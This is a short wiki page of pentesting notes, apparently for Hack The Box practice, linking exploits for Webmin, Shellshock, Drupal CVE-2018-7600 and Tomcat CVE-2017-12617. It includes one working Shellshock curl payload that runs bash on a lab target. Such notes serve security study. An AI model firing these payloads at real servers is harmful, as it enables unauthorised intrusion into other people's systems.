-
Notifications
You must be signed in to change notification settings - Fork 14
Common Linux exploits
lethanhtung01011980 edited this page Apr 23, 2020
·
8 revisions
- To gain access: Search ExploitDB for "Apache remote"
- To get root: Search ExploitDB for "Apache escalation"
Webmin RCE:
Apache mod_cgi (ShellSock RCE):
- https://exploit-db.com/exploits/34900/.
- Ref: https://marcelowoloszyn.cl/hackthebox/hack-the-box-write-up-shocker/
- MSF: https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://10.10.10.56/cgi-bin/user.sh
Drupal-RCE
- CVE-2018-7600-Drupal-RCE: https://github.com/lethanhtung01011980/CVE-2018-7600-Drupal-RCE
Tomcat RCE
- CVE-2017-12617: https://www.exploit-db.com/exploits/42966
- LinEnum & Linux Priv Checker: https://github.com/lethanhtung01011980/Notes/wiki/LinuxPriChecker